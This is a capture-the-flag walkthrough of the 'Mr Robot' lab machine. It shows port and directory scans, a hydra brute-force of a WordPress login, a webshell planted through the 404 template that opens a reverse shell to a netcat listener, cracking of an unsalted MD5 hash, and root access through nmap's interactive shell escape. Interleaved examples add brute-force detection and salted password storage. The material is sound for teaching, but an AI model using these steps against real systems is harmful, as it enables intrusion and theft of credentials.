Hacking practice...

Can you root this Mr. Robot styled machine? This is a virtual machine meant for beginners/intermediate users. There are 3 hidden keys located on the machine, can you find them?

Credit to Leon Johnson for creating this machine. This machine is used here with the explicit permission of the creator <3

1. Port scan

┌──(root㉿kali)-[/home/ace]
└─# nmap -T4 -sC -sV 10.10.135.133
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-03 09:21 CST
Nmap scan report for 10.10.135.133
Host is up (0.28s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache
443/tcp open ssl/http Apache httpd
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.83 seconds

2. Look at the web page


Hmm... a bit surreal.

Directory scan

┌──(root㉿kali)-[/home/ace]
└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.135.133/
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.135.133/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/08/03 09:31:08 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 236] [--> http://10.10.135.133/images/]
/blog (Status: 301) [Size: 234] [--> http://10.10.135.133/blog/]
/sitemap (Status: 200) [Size: 0]
/rss (Status: 301) [Size: 0] [--> http://10.10.135.133/feed/]
/login (Status: 302) [Size: 0] [--> http://10.10.135.133/wp-login.php]
/0 (Status: 301) [Size: 0] [--> http://10.10.135.133/0/]
/feed (Status: 301) [Size: 0] [--> http://10.10.135.133/feed/]
/video (Status: 301) [Size: 235] [--> http://10.10.135.133/video/]
/image (Status: 301) [Size: 0] [--> http://10.10.135.133/image/]
/atom (Status: 301) [Size: 0] [--> http://10.10.135.133/feed/atom/]
/wp-content (Status: 301) [Size: 240] [--> http://10.10.135.133/wp-content/]
/admin (Status: 301) [Size: 235] [--> http://10.10.135.133/admin/]
/audio (Status: 301) [Size: 235] [--> http://10.10.135.133/audio/]
/intro (Status: 200) [Size: 516314]
/wp-login (Status: 200) [Size: 2613]
/css (Status: 301) [Size: 233] [--> http://10.10.135.133/css/]
/rss2 (Status: 301) [Size: 0] [--> http://10.10.135.133/feed/]
/license (Status: 200) [Size: 309]
/wp-includes (Status: 301) [Size: 241] [--> http://10.10.135.133/wp-includes/]
/js (Status: 301) [Size: 232] [--> http://10.10.135.133/js/]
/Image (Status: 301) [Size: 0] [--> http://10.10.135.133/Image/]
/rdf (Status: 301) [Size: 0] [--> http://10.10.135.133/feed/rdf/]
/page1 (Status: 301) [Size: 0] [--> http://10.10.135.133/]
/readme (Status: 200) [Size: 64]
/robots (Status: 200) [Size: 41]
/dashboard (Status: 302) [Size: 0] [--> http://10.10.135.133/wp-admin/]
/%20 (Status: 301) [Size: 0] [--> http://10.10.135.133/]
Progress: 6943 / 220561 (3.15%)^C
[!] Keyboard interrupt detected, terminating.

===============================================================
2023/08/03 09:35:18 Finished
===============================================================

Look at the web page


So what is a valid username? The CTF itself is inspired by the TV show "Mr. Robot", and the protagonist's name is Elliot (even if I didn't already know that from watching the show, it is easy to find on the internet), so let's try it.


Brute-force with hydra

┌──(root㉿kali)-[/home/ace/下载]
└─# hydra -l Elliot -P fsocity.dic.uniq \
-s 80 10.10.184.29 http-post-form -t 30 \
'/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:The password you entered for the username'
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-03 13:25:33
[ERROR] File for passwords not found: fsocity.dic.uniq

┌──(root㉿kali)-[/home/ace/下载]
└─# hydra -l Elliot -P fsocity.dic \
-s 80 10.10.184.29 http-post-form -t 30 \
'/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:The password you entered for the username'
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-03 13:25:43
[DATA] max 30 tasks per 1 server, overall 30 tasks, 858235 login tries (l:1/p:858235), ~28608 tries per task
[DATA] attacking http-post-form://10.10.184.29:80/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:The password you entered for the username
[STATUS] 1122.00 tries/min, 1122 tries in 00:01h, 857113 to do in 12:44h, 30 active
[STATUS] 1115.00 tries/min, 3345 tries in 00:03h, 854890 to do in 12:47h, 30 active
[STATUS] 1009.57 tries/min, 7067 tries in 00:07h, 851168 to do in 14:04h, 30 active
^C^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.

This takes too long, so let's use the password we already have.

Password: ER28-0652
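From the defender's side, the hydra run above is loud: roughly 1,100 POSTs per minute to /wp-login.php from one address. The following added example (not code from the original post) parses constructed Apache combined-log lines and flags any client that exceeds a threshold of login POSTs inside a sliding window; the source address, timestamps and threshold are assumptions chosen to resemble this run.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache combined-log pattern: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def build_sample_log():
    """Constructed access-log lines (not from the original page): one source
    firing 40 POSTs at /wp-login.php within 40 seconds, the way a hydra
    http-post-form run looks, plus a legitimate user who mistypes once."""
    base = datetime.strptime("03/Aug/2023:13:25:43 +0800", TS_FMT)
    fmt = '{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 2613 "-" "Mozilla/5.0"'
    stamp = lambda s: (base + timedelta(seconds=s)).strftime(TS_FMT)
    lines = [fmt.format(ip="10.18.75.12", ts=stamp(i), method="POST",
                        path="/wp-login.php", status=200) for i in range(40)]
    lines += [fmt.format(ip="192.0.2.7", ts=stamp(5), method="GET", path="/blog/", status=200),
              fmt.format(ip="192.0.2.7", ts=stamp(9), method="POST", path="/wp-login.php", status=200),
              fmt.format(ip="192.0.2.7", ts=stamp(20), method="POST", path="/wp-login.php", status=302)]
    return lines

def detect_wp_login_bruteforce(lines, threshold=20, window_s=60):
    """Return {ip: peak_count} for every client that sent at least `threshold`
    POSTs to /wp-login.php inside any `window_s`-second sliding window.
    A failed WordPress login re-renders the form (200) while a success
    redirects (302), so every POST is counted and the status is left for triage.
    Lines are expected in per-client chronological order, as Apache writes them."""
    recent = defaultdict(deque)
    flagged = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or m["path"].split("?")[0] != "/wp-login.php":
            continue
        ts = datetime.strptime(m["ts"], TS_FMT)
        q = recent[m["ip"]]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:  # drop attempts older than the window
            q.popleft()
        if len(q) >= threshold:
            flagged[m["ip"]] = max(flagged.get(m["ip"], 0), len(q))
    return flagged

if __name__ == "__main__":
    print(detect_wp_login_bruteforce(build_sample_log()))  # {'10.18.75.12': 40}
```

The same counting logic applied to the real access log would have fired within the first two seconds of the hydra session shown above.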

3. Getting a shell through the web page


Upload Kali's webshell using the WordPress 404 vulnerability.

Visit the page:

Local listener:

┌──(root㉿kali)-[/usr/share/webshells/php]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.18.75.12] from (UNKNOWN) [10.10.184.29] 48435
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
06:30:47 up 1:12, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty;pty.spawn('/bin/bash')"
daemon@linux:/$ ls
ls
bin dev home lib lost+found mnt proc run srv tmp var
boot etc initrd.img lib64 media opt root sbin sys usr vmlinuz
daemon@linux:/$ cd home
cd home
daemon@linux:/home$ ls
ls
robot
daemon@linux:/home$ cd robot
cd robot
daemon@linux:/home/robot$ ls
ls
key-2-of-3.txt password.raw-md5
daemon@linux:/home/robot$ cat key-2-of-3.txt
cat key-2-of-3.txt
cat: key-2-of-3.txt: Permission denied
daemon@linux:/home/robot$ cat password.raw-ma5
cat password.raw-ma5
cat: password.raw-ma5: No such file or directory
daemon@linux:/home/robot$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

Crack the MD5 hash to get the password

┌─[root@parrort-vmwarevirtualplatform]─[/home/parrort/Desktop]
└──╼ #hashcat c3fcd3d76192e4007dfb496cca67e13b -m 0 rockyou.txt --force
hashcat (v6.1.1) starting...

You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-13th Gen Intel(R) Core(TM) i5-13500H, 2855/2919 MB (1024 MB allocatable), 1MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 64 MB

Dictionary cache built:
* Filename..: rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 2 secs

c3fcd3d76192e4007dfb496cca67e13b:abcdefghijklmnopqrstuvwxyz

Session..........: hashcat
Status...........: Cracked
Hash.Name........: MD5
Hash.Target......: c3fcd3d76192e4007dfb496cca67e13b
Time.Started.....: Thu Aug 3 14:55:25 2023, (0 secs)
Time.Estimated...: Thu Aug 3 14:55:25 2023, (0 secs)
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 464.4 kH/s (0.19ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 40960/14344385 (0.29%)
Rejected.........: 0/40960 (0.00%)
Restore.Point....: 39936/14344385 (0.28%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: promo2007 -> loserface1

Started: Thu Aug 3 14:54:49 2023
Stopped: Thu Aug 3 14:55:27 2023
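The hash in password.raw-md5 is unsalted MD5, which is why a dictionary run finds it in a fraction of a second. The following added example (not code from the original post) reproduces that lookup against a constructed four-word stand-in for rockyou.txt and contrasts it with salted PBKDF2 storage, where a leaked file no longer gives a single digest to look up; the wordlist and the PBKDF2 parameters are assumptions.

```python
import hashlib
import hmac
import os

# Constructed mini-wordlist standing in for rockyou.txt (not from the page).
WORDLIST = ["promo2007", "password1", "abcdefghijklmnopqrstuvwxyz", "loserface1"]

def parse_raw_md5_line(line):
    """Parse a 'user:hexdigest' line like the one in /home/robot/password.raw-md5."""
    user, _, digest = line.strip().partition(":")
    digest = digest.lower()
    if len(digest) != 32 or any(c not in "0123456789abcdef" for c in digest):
        raise ValueError("not a raw MD5 digest")
    return user, digest

def dictionary_lookup(digest, wordlist):
    """Unsalted, fast MD5: one hash per candidate and a comparison, nothing more.
    Return the matching word or None."""
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == digest:
            return word
    return None

def store_password(password, salt=None, iterations=600_000):
    """Hardened form: per-user random salt plus PBKDF2-HMAC-SHA256, stored as a
    self-describing string so the parameters can be raised later."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"

def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; constant-time compare."""
    _, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)

if __name__ == "__main__":
    user, digest = parse_raw_md5_line("robot:c3fcd3d76192e4007dfb496cca67e13b")
    print(user, dictionary_lookup(digest, WORDLIST))  # robot abcdefghijklmnopqrstuvwxyz
    # Same password, salted and stretched: the digest alone is useless to a wordlist.
    stored = store_password("abcdefghijklmnopqrstuvwxyz")
    print(dictionary_lookup(stored.split("$")[-1], WORDLIST))  # None
```

Beyond the hash format, the file was readable by the low-privilege daemon account; file permissions on credential material are the first control to check, independent of how the hash was computed.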

Get key 2

robot@linux:/$ cd home/robot
cd home/robot
robot@linux:~$ ls
ls
key-2-of-3.txt password.raw-md5
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
robot@linux:~$

4. Privilege escalation via sudo

The official room page hints at nmap.

robot@linux:/$ nmap --interactive
nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
# cd /root
cd /root
# ls
ls
firstboot_done key-3-of-3.txt
# cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
#